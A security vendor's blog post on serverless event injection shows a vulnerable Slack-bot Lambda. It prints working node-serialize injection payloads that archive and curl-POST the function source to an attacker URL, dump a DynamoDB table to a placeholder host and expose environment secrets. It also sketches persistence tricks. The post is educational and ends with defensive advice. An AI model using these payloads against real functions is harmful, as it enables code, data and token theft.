The OWASP Serverless Top Ten project was just launched. It aims to educate practitioners and organizations about the consequences of the most common serverless application security vulnerabilities, and to provide basic techniques for identifying and protecting against them. The project is scheduled for a first official release in Q2 2019 and will be based on data collected from real industry input through an open call.

The upcoming report will take the risks from the well-known OWASP Top Ten project and “run” them through a serverless environment, explaining and demonstrating the differences in attack vectors, defense techniques, and business impact when dealing with serverless.

This is the first in a series of posts in which I will cover known risks, taken from the traditional, monolithic world, as well as new ones, trying to shed light on this rather new technology by demonstrating the risks from both the attacker’s and the defender’s points of view.

This post deals with what might be the biggest change and, as such, the most concerning one – injection attacks.

Attacks like SQL injection, OS command injection, and code injection have always been favorites among hackers, since they usually end with a big party on the attacker’s side. On the “good guys” side, it’s a different story. These attacks are consistently ranked as the number one risk, and we usually do everything we can to prevent them. Still, even after at least two decades of monolithic application development, we keep hearing about big screw-ups that allow attackers to inject malicious code, ending with an official press-release apology and a few hundred thousand customer records posted on a random pastebin page. So, we never learn.

So, OWASP Top Ten in serverless: what if I told you that protecting against injection attacks used to be easier? Before serverless, injection attacks followed (and still follow) pretty much the same flow: an application processes input that arrives from an untrusted source over the network.


While the first part, the untrusted input, is still true, in serverless “the network” is a more complex term. Serverless functions are usually triggered by events, and an event can come from almost any service the infrastructure offers, such as cloud storage, email, or notifications.

This means that part of writing secure code is accepting that we can no longer rely on the security controls we’ve put in place on the network perimeter to do the job for us. There is no firewall we can put between a received email and the function it triggers. This leaves us with code that runs without knowing good from bad, without knowing what happened before or where its output is going. Just code. If the function’s code is vulnerable to any type of injection attack, in the serverless world it is usually referred to as event injection.

Enough with the FUD, let’s see how it really looks.

Consider the following simple serverless event-injection scenario:

  1. A user interacts with a Slack chat-bot channel
  2. The user’s message is sent to Slack’s backend
  3. The Slack backend is configured to forward the message to the organization’s API Gateway
  4. The request triggers a set of Lambda functions through the event
  5. One of the Lambda functions writes the message to a DynamoDB table
  6. The function then sends an automatic reply back to the Slack backend
  7. Which posts the reply as the Slack bot on the designated channel

In our example, the event injection is possible because the Lambda function triggered by the Slack event is vulnerable to code injection. On AWS, the majority of functions run dynamic languages (e.g. Python or NodeJS), so a successful injection can result in completely different code running instead of (or together with) the original code. RCE-style.
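To make this concrete, here is a hypothetical sketch of what such a vulnerable handler might look like. All names (handler, table, environment variables) are assumptions, and the parsing here relies on the node-serialize package, whose unserialize() call evals any string marked with the _$$ND_FUNC$$_ prefix discussed below:

```javascript
// Hypothetical reconstruction of the vulnerable handler (all names assumed).
// node-serialize's unserialize() ultimately calls eval() on any value
// prefixed with _$$ND_FUNC$$_, so attacker-controlled event data can
// become attacker-controlled code.
const AWS = require('aws-sdk');
const serialize = require('node-serialize');
const dynamo = new AWS.DynamoDB.DocumentClient();

exports.handler = async (event) => {
  // event.body carries the Slack message forwarded through API Gateway
  const message = serialize.unserialize(event.body); // injection point

  // store the chat message (table name is an assumption)
  await dynamo.put({
    TableName: process.env.TABLE_NAME,
    Item: { id: Date.now().toString(), text: message.text }
  }).promise();

  // reply so the bot posts the message back to the Slack channel
  return { statusCode: 200, body: JSON.stringify({ text: message.text }) };
};
```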

As you can see, the code above (a pattern repeatedly found in the wild) ultimately relies on eval(), which we all know (do we?) we should avoid, to parse the JSON data coming in on the event. However, this is merely an example; the same risk can arise from any other vulnerable code.

After verifying the vulnerability (any sleep or curl technique will do), the attacker can start exploiting the serverless environment. It’s true that most of the files inside the environment will not interest the attacker, so we can finally forget about the /etc/passwd examples; those files belong to the environment’s container and mostly play no significant role in the application. However, there are other assets worth going after. For example, with access to the environment, an attacker can steal the entire function code by injecting the following payload:

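A hypothetical reconstruction of such a payload, based on the explanation below, might look like this ($l4 stands for a URL under the attacker’s control):

```json
{"text": "_$$ND_FUNC$$_function(){require('child_process').exec('tar -pcvzf /tmp/source.tar.gz ./; b=`base64 --wrap=0 /tmp/source.tar.gz`; curl -X POST $l4 --data $b', function(e, out, err){});}()"}
```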

Let me explain. The _$$ND_FUNC$$_ prefix is the pattern that marks the data to be treated as a function. Since the function runs NodeJS, we can use require(“child_process”).exec() to spawn a new process, which allows an attacker to execute anything the function’s container can run. Without getting too deep into AWS Lambda internals, when a NodeJS function is launched its code sits on the container, in the working directory. This means an attacker can simply archive the code into /tmp (the only non-read-only folder in the environment), encode it with base64, and send it somewhere he has access to: tar -pcvzf /tmp/source.tar.gz ./; b=`base64 --wrap=0 /tmp/source.tar.gz`; curl -X POST $l4 --data $b.

The result?

From there it’s no more than a minute to obtain the entire function code.
Looking at the code, it is possible to see the Slack request in stage #6:
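A hypothetical sketch of that reply logic, with the endpoint, channel, and variable names all assumed for illustration, might look like this:

```javascript
// Hypothetical sketch of the reply logic visible in the recovered source
// (stage 6 of the scenario). Endpoint and variable names are assumptions.
const https = require('https');

function replyToSlack(text, callback) {
  const body = JSON.stringify({
    channel: process.env.CHANNEL,     // configuration comes from environment
    icon_url: process.env.ICON_URL,   // variables, so their values never
    username: 'serverless-bot',       // appear in the code itself
    text: text
  });
  const req = https.request({
    hostname: 'slack.com',
    path: '/api/chat.postMessage',
    method: 'POST',
    headers: {
      'Content-Type': 'application/json',
      'Authorization': 'Bearer ' + process.env.BOT_TOKEN
    }
  }, callback);
  req.write(body);
  req.end();
}
```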


Even though it is not possible to read the environment variable values from the code, an attacker can simply use them as is, since they are part of the environment.

Eventually, the attacker can inject code that modifies the behavior of the original bot. In the example below, a malicious payload modifies the bot’s avatar and prints the original ICON_URL (it goes without saying that stealing the BOT_TOKEN itself could lead to a partial takeover of the entire Slack account):
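One hypothetical variant of such a payload, leaning on the fact that (in the sketch above) the injected function’s return value becomes the text the bot echoes back, would be:

```json
{"text": "_$$ND_FUNC$$_function(){return process.env.ICON_URL;}()"}
```

Swapping the avatar works the same way; the injected function just needs a longer body that calls the Slack API itself with a different icon_url.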

It is also possible to inject code that uses the provider’s APIs, such as the AWS SDK. This allows an attacker to interact with any other resource in the account. For example, since the vulnerable function reads from a certain DynamoDB table, the attacker can use the DynamoDB.DocumentClient.scan() function, along with the table details already available in the code, to read from that same table, leveraging the Slack channel to post the retrieved data:

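A hypothetical sketch of the code an attacker could inject (wrapped in the same _$$ND_FUNC$$_function(){...}() marker as before) might look like the following, where the table name comes from the same environment variable the function already uses and $HOOK_URL is a placeholder for wherever the attacker wants the dump posted:

```javascript
// Hypothetical injected code (it would travel inside the same
// _$$ND_FUNC$$_function(){...}() wrapper shown earlier).
// It reuses the AWS SDK bundled with the Lambda runtime and the table
// name already present in the function's environment.
const AWS = require('aws-sdk');
const dynamo = new AWS.DynamoDB.DocumentClient();

dynamo.scan({ TableName: process.env.TABLE_NAME }, function (err, data) {
  if (err) return;
  // ship the dumped items out; $HOOK_URL is a placeholder destination
  require('child_process').exec(
    "curl -s -X POST $HOOK_URL --data '" + JSON.stringify(data.Items) + "'",
    function () {}
  );
});
```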

However, attacking a serverless function through Slack is only one of the new attack vectors that are now part of our application’s lifecycle. The same attack can be performed through an email (subject, attachment, or header), MQTT pub/sub messaging, a cloud storage event (file upload/download, etc.), queues, logs, code commits, or any other event that can trigger our code.

The impact varies. It’s true that there is no server and therefore no server takeover. But while in our example the attacker was able to read code, impersonate a function, leak data from the database, and compromise the Slack account, other scenarios could lead to a full cloud account takeover, depending on the permissions of the vulnerable function (stay tuned!). If the function can access other resources, then it’s only a matter of injecting the right code.

So, how should we protect against such attacks? Well, not everything has to change. Most of the traditional best practices also apply in serverless: never trust or make assumptions about input and its validity, use safe APIs, and run the code with the least privileges required to perform the task, to reduce the attack surface. Developers must also still be trained to write secure code. There is no way around that.
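As a minimal illustration of those practices, applied to the hypothetical handler sketched earlier, the parsing step alone becomes far less interesting to an attacker:

```javascript
// Safer variant of the parsing step: no eval, no deserialization of
// functions, and explicit validation of the single field the bot needs.
exports.handler = async (event) => {
  let data;
  try {
    data = JSON.parse(event.body);   // parse data as data, never as code
  } catch (e) {
    return { statusCode: 400, body: 'invalid request' };
  }

  // accept only what the bot expects: a short, plain-text message
  if (typeof data.text !== 'string' || data.text.length > 500) {
    return { statusCode: 400, body: 'invalid message' };
  }

  // ...store and reply as before, ideally with an IAM role limited to
  // dynamodb:PutItem on this one table (least privilege).
  return { statusCode: 200, body: JSON.stringify({ text: data.text }) };
};
```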

However, as humans, we are prone to errors that go beyond the OWASP Top Ten. Thus, we must find a way to automate things and protect against our own mistakes. But how do we do that when there is no single perimeter to defend?

We believe that a defense control for a serverless environment should be serverless itself. Otherwise, we lose everything we moved to serverless for in the first place. A wise man once said that just as we wouldn’t use swords to protect our spaceships, we can’t use old technology to protect new technology. A serverless defense should be ephemeral. It should live and die with the code it protects.

The Protego Labs solution also includes function runtime defense against injection attacks, traversal attacks, XSS, and many more. Now imagine squeezing the entire attack scenario I just showed into a single runtime alert.


There are other aspects that make serverless injection attacks different from traditional ones. Some we have already discussed, like the different types of input sources, the prevalence of dynamic languages, and the relevant (and irrelevant) files in the environment. But there are more. For instance, serverless functions usually live for only a few seconds to minutes. How would an attack persist in such an environment? A naive attack would last only until the function dies, and the attacker would probably have to run it repeatedly, which could get noticed. However, there are other ways an attack can persist. One is simply keeping the container “warm”: the attacker fires the triggering event every few minutes to make sure the container keeps running. Another is to inject a payload that modifies the function’s source code, which I will show in a separate post. That causes every new container to run the malicious code, leaving the environment compromised.

TL;DR

Don’t panic! Get educated by subscribing to this blog series.

